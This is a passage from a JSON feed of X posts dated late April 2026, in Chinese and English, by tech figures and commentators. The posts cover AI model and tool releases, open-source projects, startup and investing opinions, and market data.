单人维护、日活更新\n\n一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。\n\n含 16 个 skill:tdd / diagnose / improve-codebase-architecture / to-prd / to-issues / triage / grill-me / zoom-out / git-g", "url": "https://x.com/GoSailGlobal/status/2049339826877665496"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:53:48+00:00", "title": "x.com/i/article/204933030407…", "url": "https://x.com/GoSailGlobal/status/2049336319286063302"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T03:49:14+00:00", "title": "我就知道🤣🤣🤣", "url": "https://x.com/dingyi/status/2049335171066061234"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:42:31+00:00", "title": "RT by @paulg: MIT student asked a question earlier today that a lot of young founders are quietly wondering about:\n\n\"Won’t the frontier labs just do everything?\"\n\nYes it's true that OAI/Ant are shipping at incredible pace, but it's quite easy to avoid their blast radius and build", "url": "https://x.com/paulg/status/2049333482271260710"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T03:37:16+00:00", "title": "RT by @elonmusk: The exact same question to Grok 4.3, GPT 5.5, and Claude Opus 4.7:\n\n“Count to 10 starting from 11”\n\nGrok 4.3 wins 🏆\nEvery single time\n\nIt gave 11, 10 and explained why going backwards was the only logical move... The others started counting from 11 to 20\n\nGrok’s ", "url": "https://x.com/elonmusk/status/2049332159601942995"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-29T03:29:10+00:00", "title": "RT by @paulg: What do the smartest kids in the world do when they grow up?\n\nI did the largest study of ~18,000 International Olympiad medalists (IMO, IOI and IPhO) over the last 25yrs, arguably the sharpest analytical minds of the world in high school, to see where they ended up ", "url": "https://x.com/paulg/status/2049330123464393084"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:30+00:00", "title": "R to @lxfater: 海报图片提示词 :\n\n请生成一张随机的瑜伽宣传海报拼贴总图。\n整体要求:\n在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报\n每张卡面尺寸随机设计铺满整张图\n卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开\n整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报\n每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化\n所有海报统一保持高级、专业、吸引人,适合瑜伽课程宣传、社媒推广、品牌视觉展示\n\n分镜摆姿势提示词:将图一的女性改为图二的4,5姿势,生成图片\n\n视频提示词:根据首尾帧生成丝滑的,就是专业瑜伽演", "url": "https://x.com/lxfater/status/2049329956153352499"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:29+00:00", "title": "R to @lxfater: 如何使用Agent 模式 3 步:\n\n选图像模式\n选GPT-2-image\n点 Agent 按钮\n\n利用下面给的提示词,出了分镜图和人设图\n\n接下来,利用分镜图和人设图,我们就可以控制人物动作啦!!\n\n如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示)\n\n得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了\n\n多个视频就可以出系列的瑜伽动作\n\nflowith的高级套餐包含 GPT Image 2 和 Nanobanana 2 flash 无限生成\n需要的可以使用下面链接,注册送积分:https:", "url": "https://x.com/lxfater/status/2049329950495310198"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T03:28:28+00:00", "title": "做内容运营,生图生视频,你现在还在跑好几个工具吗?\n\n被朋友拉去做瑜伽图,搭了无数工作流\nGPT Image 2 出来后,发现全废了\n\n得重新规划一套,但这几天身体不舒服,没心思搞\n随手把提示词扔进 flowith 试了一下\n\n以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。\n\n它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整\n\n分镜图和人物图来生成出首末两张图片,用视频模式可灵模型,简单的演示视频,一条链路打通,全在一个工具里面\n\nAgent 模式还能联网,生成下周海报日历,日期星期都是对的,普通的生图模型记忆估计2025年", "url": "https://x.com/lxfater/status/2049329944052859141"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:42+00:00", "title": "4/29 AI 圈速览\n\n• OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线\n\n• Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同\n\n• Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光\n\n• mattpocock 开源个人 .claude Skills 目录:工程师级实战合集\n\n• Composio 发布 awesome-codex-skills:Codex 跨平台自动化即插即用\n\n• Lovable Vibe Coding 上线 iO", "url": "https://x.com/GoSailGlobal/status/2049327989951967546"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T03:20:09+00:00", "title": "🔥 今日新鲜 Skills 精选 Top 10(4月29日)\n由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀\n\nMozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!!\n\n1️⃣ mozilla-ai/any-llm\n⭐ 1928 | +1928\nMozilla AI 出品——一个接口跟所有 LLM provider 通信,挑战 LiteLLM\n🔗 https://github.com/mozilla-ai/any-llm\n🌐 https://", "url": "https://x.com/GoSailGlobal/status/2049327853469310984"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T03:10:50+00:00", "title": "RT by @GaryMarcus: Gary, that was a great article. Wonderful work as always sir. You have been proven accurate once again.", "url": "https://x.com/GaryMarcus/status/2049325506764677608"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T03:09:17+00:00", "title": "有做 摄影行业 的朋友吗,有个项目想聊一聊😊", "url": "https://x.com/gkxspace/status/2049325117998592311"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:54:33+00:00", "title": "RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。\n\n关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。\n如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行!\n\n感谢大家的支持!🥰", "url": "https://x.com/realNyarime/status/2049321411420811479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-29T02:53:39+00:00", "title": "the ability of this man to sell things he doesn’t believe in is truly extraordinary", "url": "https://x.com/GaryMarcus/status/2049321182089081059"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T02:39:00+00:00", "title": "好消息:沪爷可以去金马了\n坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注", "url": "https://x.com/realNyarime/status/2049317496361292240"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:31:21+00:00", "title": "R to @sama: at this point @ajambrosino is mogmogging\n\nenjoy the next few updates", "url": "https://x.com/sama/status/2049315574120055054"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-29T02:27:13+00:00", "title": "Image", "url": "https://x.com/sama/status/2049314532892475791"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-29T02:16:00+00:00", "title": "群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。\n\n听着像废话,但这个常识在 AI 时代变得尖锐——\n\n以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。\n\n护城河从\"代码会写\"变成\"策略会想\"。\n\n这件事我自己也在分层做——\n\npolymarket-toolkit 我开源(仓库https://github.com/runesleo/polymarket-toolkit),它解决的是数据采集、API 调用这类工具层的事。复用价值大,门槛低,开源等于做品牌。\n\nH 系列做市/ta", "url": "https://x.com/runes_leo/status/2049311708330459226"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:58:03+00:00", "title": "说个冷知识\n\n云服务厂商还是很有投资眼光的\n\n原价或者加价买了H100,现在还能卖那个价,甚至更高\n\n另外他还能出租5年保修期内的机器\n\n这不妥妥当下最具价值的投资品类嘛", "url": "https://x.com/GoSailGlobal/status/2049307192692781200"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:56:48+00:00", "title": "R to @charliebilello: x.com/charliebilello/status/…", "url": "https://x.com/charliebilello/status/2049306875301130507"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:55:58+00:00", "title": "RT by @elonmusk: #BREAKING: Chairman @Jim_Jordan invites Southern Poverty Law Center Interim CEO and President Bryan Fair to testify publicly on Wednesday, May 20, 2026, at 10:00 a.m.", "url": "https://x.com/elonmusk/status/2049306669352358192"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:55:13+00:00", "title": "US home prices increased 0.7% over the last year, the slowest growth rate since June 2023. There are currently a record 46% more sellers than buyers nationally. Absent manipulation from the Federal Government/Reserve, prices will come down and homes will become more affordable.", "url": "https://x.com/charliebilello/status/2049306480071873011"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-29T01:47:21+00:00", "title": "Ghostty 离开 GitHub,同一天 Warp 宣布开源。\n\nWarp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。\n\n还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!", "url": "https://x.com/dingyi/status/2049304499093946475"}, {"handle": "gkxspace", "name": "余温", "published_at": "2026-04-29T01:38:07+00:00", "title": "R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人”\n\n技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作\n\n更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性", "url": "https://x.com/gkxspace/status/2049302176900501544"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T01:24:00+00:00", "title": "\"SBC becomes a problem when stock prices fall and dilution explodes.\n\nWhat was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape.\n\nThe fix is to be far more selective, give equity to the top performers who drive value, and pay the rest i", "url": "https://x.com/HarryStebbings/status/2049298621951058341"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-29T01:23:28+00:00", "title": "RT by @charliebilello: Since the start of the Iran war...\nJet Fuel: +70%\nSulfur: +60%\nBrent Crude Oil: +52%\nHeating Oil: +52%\nWTI Crude Oil: +48%\nUrea: +48%\nDiesel: +45%\nGasoline: +40%\nEuropean Nat Gas: +36%\nFertilizer: +23%\nPalm Oil: +12%\nCoal: +11%\nWheat: +10%\nIron Ore: +8%\nS&P", "url": "https://x.com/charliebilello/status/2049298490489004357"}, {"handle": "GoSailGlobal", "name": "Jason Zhu", "published_at": "2026-04-29T01:22:14+00:00", "title": "RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布\n这应该是全球第二篇与GEO有关的专项论文\n\n论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅\n\n如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并开放研究成果\n\n网页地址:https://arxiv.org/abs/2604.25707\n论文PDF:https://arxiv.org/pdf/2604.", "url": "https://x.com/GoSailGlobal/status/2049298176935690588"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:17:10+00:00", "title": "搭配收集免费模型的开源项目 使用这篇文章更佳\n\nhttps://github.com/cheahjs/free-llm-api-resources", "url": "https://x.com/Pluvio9yte/status/2049296905382035945"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T01:16:51+00:00", "title": "RT by @elonmusk: Following future rollout of FSD V14 Lite for HW3 vehicles in the US, we plan on expanding V14 Lite to additional international markets.\n\nThis update ensures that HW3 vehicle owners will continue to benefit from ongoing software updates.\n\nSince international rollo", "url": "https://x.com/elonmusk/status/2049296822162874685"}, {"handle": "realNyarime", "name": "奶昔", "published_at": "2026-04-29T01:15:23+00:00", "title": "昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月\n支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情\n\n接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!", "url": "https://x.com/realNyarime/status/2049296454905393361"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T01:07:12+00:00", "title": "Big Zesty 💪", "url": "https://x.com/jason/status/2049294394075849059"}, {"handle": "Pluvio9yte", "name": "雪踏乌云", "published_at": "2026-04-29T01:02:14+00:00", "title": "x.com/i/article/204914647001…", "url": "https://x.com/Pluvio9yte/status/2049293145670836459"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-29T00:48:58+00:00", "title": "旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。\n\n和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。", "url": "https://x.com/svwang1/status/2049289806241550791"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:23:52+00:00", "title": "RT by @elonmusk: Ookla says @Starlink has been a game-changer for inflight Wi-Fi speeds. Their new report ranks which airline has the fastest Wi-Fi:\n\n\"Starlink stood out for its speed. Of over 50 airlines evaluated, the eight airlines that exceeded 100 Mbps median download speed ", "url": "https://x.com/elonmusk/status/2049283488600277368"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-29T00:09:36+00:00", "title": "RT by @elonmusk: Super high bandwidth to commercial aircraft with @Starlink", "url": "https://x.com/elonmusk/status/2049279898976702535"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-29T00:05:58+00:00", "title": "Oh lordy... here comes the lawfare madness again 🤦\n\n86 when I grew up in the restaurant business meant “to get rid of” something (ie “86 clams” meant to take clams off the menu). \n\nI was told it had two origins:\n\n1. 86 Chumley's, which was the address of the speakeasy in Manhatta", "url": "https://x.com/jason/status/2049278984513310783"}, {"handle": "lxfater", "name": "铁锤人", "published_at": "2026-04-29T00:05:46+00:00", "title": "看来草莓问题和洗车问题很经典了,ChatGPT都在测试", "url": "https://x.com/lxfater/status/2049278935897186512"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-29T00:05:00+00:00", "title": "\"No, layoffs alone will not fix the problem.\n\nIf a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity.\n\nThe real issue is culture and talent quality, and fixing that usually requires a full rebuild, which is extremely hard, especial", "url": "https://x.com/HarryStebbings/status/2049278741583643076"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:51:30+00:00", "title": "Not investment advice…. but WERE AT A FOUR YEAR HIGH AND WE CRUSHED EARNINGS 😂😂🤦😂😂\n\nNever change Philly!!!", "url": "https://x.com/jason/status/2049275346109796388"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:51:17+00:00", "title": "Google Gemma 官方教你本地跑 Coding Agent!\n\n本地完美组合来了:\n• Pi Agent\n• Gemma 4 26B 模型\n• LM Studio / Ollama / llama.cpp 等 serving engine\n\n完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器!\n\n附 @patloeber 详细一步步搭建教程👇\nhttps://patloeber.com/gemma-4-pi-agent/", "url": "https://x.com/berryxia/status/2049275291164692726"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T23:50:25+00:00", "title": "Lock in, GAME FIVE, @knicks fam!\n\n@BenStiller @jalenbrunson1 @Arifromanhattan \"\">@CPTheFanchise @jerryferrara @MrChuckD\n@RealChalamet @fredwilson @msavino\n@JDSportsTalkNY @nihalmehta @WorldWideWob\n@BillSimmons😂@JesseItzler @ajv 📷 @duglust @ischafer @sirgutz @Traticaster101 \n\nHow", "url": "https://x.com/jason/status/2049275070800150851"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T23:46:25+00:00", "title": "🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了!\n\n9B 参数多模态模型实现突破性实时交互:\n\n• Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步)\n\n• Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒)\n\n• 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / MathVista 80.1)\n\n• 极致 Edge AI:完全离线运行,一键安装 Windows / macOS(12G VRAM 即可)\n\n• 100%", "url": "https://x.com/berryxia/status/2049274065610027362"}, {"handle": "runes_leo", "name": "Leo", "published_at": "2026-04-28T23:38:00+00:00", "title": "之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。\n\n- Star ⭐ = 书签,零通知\n- Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推\n- Watch (Releases only) = 只有打 tag 发 release 才推\n\n所以 star 在机制层就是个公开的\"值得存一下\"标签,不是订阅、不反映使用、甚至不代表看过。每次 ", "url": "https://x.com/runes_leo/status/2049271946022474215"}, {"handle": "dingyi", "name": "Ding", "published_at": "2026-04-28T22:59:18+00:00", "title": "我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。\n\nhttps://fatetell.com/zh-CN/invite?referral=QQE5QT", "url": "https://x.com/dingyi/status/2049262208241332358"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:25+00:00", "title": "R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC\n\n```", "url": "https://x.com/berryxia/status/2049260222863266206"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:51:22+00:00", "title": "这个老哥 写的SwiftVLC 正式开源啦!🔥\n\n现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用):\n\n• 直接 C bindings,无 Objective-C 桥接 \n• 严格并发支持(Strict Concurrency) \n• 专为 SwiftUI 量身打造 \n• 支持 iOS、macOS、tvOS、Mac Catalyst \n\n附带完整 Showcase App(40 个案例)和详细 DocC 文档!", "url": "https://x.com/berryxia/status/2049260211895185445"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:48:37+00:00", "title": "GPT2 真的成精了!的确!\n小小东老哥整的这套提示词很不错,推荐大家!", "url": "https://x.com/berryxia/status/2049259518027276559"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-28T22:48:24+00:00", "title": "RT by @elonmusk: The California Coastal Commission has issued a formal apology to @elonmusk and SpaceX, adding that it will not consider political views or speech in future regulatory decisions.\n\n• The Commission admits some officials made politically biased and improper statemen", "url": "https://x.com/elonmusk/status/2049259466973933764"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:31:31+00:00", "title": "3D 网格生成重磅突破!SATO 来了!\n\n• 从点云(Point Clouds)直接生成完整网格 \n• Strip-based tokenization,实现超干净边缘流与结构 \n• 原生 UV segmentation 直接 baked into 生成过程 \n• 单个模型同时支持三角网格 + 四边形网格", "url": "https://x.com/berryxia/status/2049255217603178794"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T22:28:53+00:00", "title": "If this passes, what impact (if any) do you think @RoKhanna’s $25 minimum wage will have on unemployment rate in California? \n\nShow your work.", "url": "https://x.com/jason/status/2049254554550653047"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:26:54+00:00", "title": "我靠!兄弟们?Warp 都要开源了!\n\n官方宣布Warp 正式全面开源啦!🔥\n\n知名现代终端 + Agentic 开发环境 Warp 现在完全开源!\n\n• 代码、Roadmap、贡献流程全部开放\n• GitHub:https://github.com/warpdotdev/warp\n• Oz AI agents(GPT 驱动)负责 coding、planning、testing\n• OpenAI Devs 担任 founding sponsor\n\n开发者福音!\n欢迎社区一起共建下一代终端工具 🚀", "url": "https://x.com/berryxia/status/2049254052840812960"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T22:24:00+00:00", "title": "\"You cannot have only A players in every role, some functions are just there to keep the business running.\n\nBut you can build a team where the people you keep are the highest performers in those roles.\n\nA players thrive when surrounded by other strong performers, but they get dra", "url": "https://x.com/HarryStebbings/status/2049253323329704378"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:22:48+00:00", "title": "NVIDIA 重磅发布!🚀 \n\nNemotron 3 Nano Omni 多模态开源模型来了!\n\n🔥 30B 参数\n🔥 256K 超长上下文\n🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化)\n🔥 专为 subagents / Agentic 任务设计\n🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单\n\n可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作流。", "url": "https://x.com/berryxia/status/2049253021159403786"}, {"handle": "svwang1", "name": "王川(硅谷)", "published_at": "2026-04-28T22:20:52+00:00", "title": "人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。", "url": "https://x.com/svwang1/status/2049252535689757003"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:20:51+00:00", "title": "Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生!\n\n这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例!\n\n纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。\n\n支持3D立体显微视野、实时数据叠加 + 远程专家协作,空间计算正式进入手术室!\n\n```", "url": "https://x.com/berryxia/status/2049252532015579248"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:55+00:00", "title": "R to @berryxia: huggingface.co/poolside/Lagu…", "url": "https://x.com/berryxia/status/2049250788422353142"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:13:37+00:00", "title": "前Github CTO team带着新模型来了!\n\n他们的Poolside AI 团队刚刚开源了他们的首个权重模型!\n\n模型名称 Laguna XS.2\n• 33B total / 3B active MoE\n• Apache 2.0 完全开源\n• 专为 Agentic Coding + 长时序任务设计\n• 单张 GPU 即可流畅运行\n\n同时发布 Laguna M.1(当前最强版)和 Agent Harness。\n\n由前 GitHub CTO Jason Warner 创立的团队,coding agent 赛道新力量!\n\n```", "url": "https://x.com/berryxia/status/2049250710492160228"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:10:16+00:00", "title": "🚀 视频模型其实早就懂3D了!\n\n微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本!\n\n1. 把相机轨迹嵌入扩散噪声,零额外模块\n\n2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器\n\n3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动\n\n4. 仅用3K条文本提示完成训练,效果惊人\n\n视频生成迈向真实世界模拟的关键一步!\n\n项目地址:\nhttps://github.com/microsoft/World-R1", "url": "https://x.com/berryxia/status/2049249868376604931"}, {"handle": "berryxia", "name": "Berryxia", "published_at": "2026-04-28T22:02:28+00:00", "title": "Claude 重磅连接创意专业工具!\n\n全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来!\n\n1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成\n\n2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满\n\n3.同日上线更多连接器:Adobe Creative Cloud、Ableton、Splice、Canva \nAffinity、SketchUp、Resolume\n\n4. 正式加", "url": "https://x.com/berryxia/status/2049247904536428805"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:46:18+00:00", "title": "Wow. Musk’s lawyers will capitalize on this.", "url": "https://x.com/GaryMarcus/status/2049243836359254025"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:44:35+00:00", "title": "From what I can tell, Elon Musk just stepped on his own toes at the trial, making it all about him instead of the promises Altman and Brockman broke.\n\nOpenAI will slay his ego on cross. \n\nHe should have made it about them.\n\n(reporting from @MikeIsaac at NYT)", "url": "https://x.com/GaryMarcus/status/2049243406380237116"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:37:05+00:00", "title": "Image", "url": "https://x.com/sama/status/2049241518540808440"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-28T21:36:28+00:00", "title": "RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 !\n\nAs my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers:\n- EB-JEPA https://github.com/facebookresearch/eb_jepa: Presented as an Oral 🏅 (top ~3% of papers) at the", "url": "https://x.com/ylecun/status/2049241361266684288"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T21:21:16+00:00", "title": "I am worried by the constraining exit options for venture backed companies: \n\n1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has been a s*** IPO. \n\n2. Acquisition by Incumbent: Yes but they are so specific. Ver", "url": "https://x.com/HarryStebbings/status/2049237538901020767"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-28T21:12:19+00:00", "title": "wow y'all love 5.5\n\nwe should think of something nice to do to celebrate!", "url": "https://x.com/sama/status/2049235284655780000"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-28T21:06:51+00:00", "title": "RT by @GaryMarcus: As an avid cyclist, I was amused to see ChatGPT's “powerful new image engine\" draw a bicycle with the \"brake\" label pointing to empty space where brakes are sometimes found on other bicycles. The point of these AI fails (regularly collected by @garymarcus) is n", "url": "https://x.com/GaryMarcus/status/2049233910266278250"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:39:11+00:00", "title": "We're in Stockholm. You know how there are some places where you think \"Nice place to visit, but I wouldn't want to live there\"? Stockholm is the kind of place that makes you want to live there.", "url": "https://x.com/paulg/status/2049226946471489602"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:35:56+00:00", "title": "There are some real bombshells in this one.", "url": "https://x.com/paulg/status/2049226128603172949"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-28T20:32:16+00:00", "title": "\"He just doesn't listen to me. Just like you.\"\n\n— Jessica on our younger son", "url": "https://x.com/paulg/status/2049225204132421727"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-28T20:31:00+00:00", "title": "Do the majority of company teams need to be rebuilt for the technology we have today?\n\n\"Yes, teams need to be rebuilt for the AI era.\n\nIf roles are going to be automated or not adapting fast enough, you have to redesign the org from scratch based on what is possible today.\n\nThe c", "url": "https://x.com/HarryStebbings/status/2049224886128722345"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:26:28+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2049223746368483370"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-28T20:20:22+00:00", "title": "“YouTube videos about AI, but with no soyface”", "url": "https://x.com/pmarca/status/2049222212008206717"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-28T20:16:21+00:00", "title": "Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below.\n\nTranslate is one of my favorite Google products because it brings us all closer together!\n\nI've been involved with a couple of things over the years. The first was our deployment of the initi", "url": "https://x.com/JeffDean/status/2049221200321380805"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:59:07+00:00", "title": "There are five things you can focus on in your life that will help you lead a balanced and fulfilling life.", "url": "https://x.com/jason/status/2049216863574364182"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:58:37+00:00", "title": "If you're feeling unbalanced in your life, I highly recommend checking in on my big five.", "url": "https://x.com/jason/status/2049216735912329567"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:55:41+00:00", "title": "We're all standing on the shoulders of Adam Curry and Dave Weiner.", "url": "https://x.com/jason/status/2049215999795138656"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:54:02+00:00", "title": "RT by @Jason: Peter Thiel: “We’ve tried to do too much investing in Europe. It’s always sort of a junket.”\n\n“It’s a nice place to go on vacation as an investor.”\n\n“It’s a very strange thing—the US is somehow still the country where people do new things.”\n\nVia @theallinpod", "url": "https://x.com/jason/status/2049215583351341460"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:16+00:00", "title": "AutoLane is my next uber.", "url": "https://x.com/jason/status/2049215140810072429"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:52:00+00:00", "title": "The future is autonomous, and auto lane is going to play a major role in managing autonomy for giant parking lots!\n\nHighly recommend listening to this podcast to understand what the future will look like.", "url": "https://x.com/jason/status/2049215070970814469"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-28T19:51:11+00:00", "title": "What album or two do you have in deep rotation at the moment?\n\nIt could be from the archives or it could be a brand new selection.", "url": 